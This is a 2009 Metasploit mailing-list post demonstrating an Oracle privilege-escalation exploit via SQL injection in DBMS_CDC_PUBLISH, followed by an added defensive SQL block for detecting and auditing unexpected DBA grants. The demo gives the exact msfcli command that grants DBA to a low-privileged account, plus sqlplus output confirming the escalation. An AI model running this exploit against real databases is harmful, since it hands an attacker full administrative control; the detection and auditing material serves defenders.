we've slowly been adding oracle support to the metasploit framework. the following is an example of how you can use current modules exploiting sql injection vulnerabilities in various packages/procedures using the sqlplus client.
* demo *

fueng:msf-dev mc$ ./msfcli auxiliary/admin/oracle/dbms_cdc_publish SQL="grant dba to metasploit" E
[*] Creating 'msf.sql' file ...
[*] File 'msf.sql' is located in './data/exploits/' ...
fueng:msf-dev mc$ cd instantclient_10_2/
fueng:instantclient_10_2 mc$ ./sqlplus metasploit/metaspl...@172.10.1.109/orcl

SQL*Plus: Release 10.2.0.4.0 - Production on Wed Feb 18 18:27:54 2009

Copyright (c) 1982, 2007, Oracle. All Rights Reserved.

Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Production
With the Partitioning, OLAP and Data Mining options

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
METASPLOIT                     CONNECT                        NO  YES NO

SQL> @../data/exploits/msf.sql
DECLARE
*
ERROR at line 1:
ORA-01400: cannot insert NULL into ("SYS"."DBMS_LOCK_ALLOCATED"."NAME")
ORA-06512: at "SYS.DBMS_CDC_UTILITY", line 436
ORA-06512: at line 1
ORA-06512: at "SYS.DBMS_CDC_PUBLISH", line 535
ORA-06512: at line 1
ORA-06512: at line 8

Function dropped.

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
METASPLOIT                     CONNECT                        NO  YES NO
METASPLOIT                     DBA                            NO  YES NO

* *

in the near future, a mixin using ruby-dbi/ruby-oci8/oracle-instant-client will be added. a demo of this can be seen here: http://www.w00t-shell.net/demos/CVE-2008-1815-escalate.html

--
~ mc

_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers
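As an added example (not part of the original post or of the framework), here is what a DBA would run on the other side of the demo above: look for the unexpected DBA grant, see who can execute the package at all, and switch on auditing so a repeat leaves a record. It assumes Oracle's traditional auditing with AUDIT_TRAIL set to DB; the role and package names are the ones that appear in the demo.

```sql
-- Added example, not from the original post. Run as a DBA.
-- Assumes traditional (pre-unified) auditing with AUDIT_TRAIL=DB.

-- 1. Which accounts hold DBA? Anything beyond SYS and SYSTEM needs an owner
--    and a reason; the demo's METASPLOIT account would show up here.
SELECT grantee, granted_role, admin_option, default_role
  FROM dba_role_privs
 WHERE granted_role = 'DBA'
   AND grantee NOT IN ('SYS', 'SYSTEM')
 ORDER BY grantee;

-- 2. Who can execute SYS.DBMS_CDC_PUBLISH? A grant to PUBLIC or to an
--    ordinary application account is the exposure the demo relies on.
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_CDC_PUBLISH'
 ORDER BY grantee;

-- 3. Record every future GRANT/REVOKE of roles and system privileges, and
--    every call into the package, one audit row per statement.
AUDIT SYSTEM GRANT BY ACCESS;
AUDIT EXECUTE ON sys.dbms_cdc_publish BY ACCESS;

-- 4. Review the trail: role grants and package calls, most recent first.
--    A GRANT ROLE row for DBA that no administrator issued is the signal;
--    RETURNCODE is 0 on success, otherwise the ORA- error number.
SELECT timestamp, username, os_username, userhost,
       action_name, obj_name, returncode
  FROM dba_audit_trail
 WHERE action_name = 'GRANT ROLE'
    OR (action_name = 'EXECUTE PROCEDURE' AND obj_name = 'DBMS_CDC_PUBLISH')
 ORDER BY timestamp DESC;
```

Revoking the package grant from accounts that do not need it, and applying the vendor patch, closes the path the demo walks; the audit rows give you the evidence if it was walked before you did.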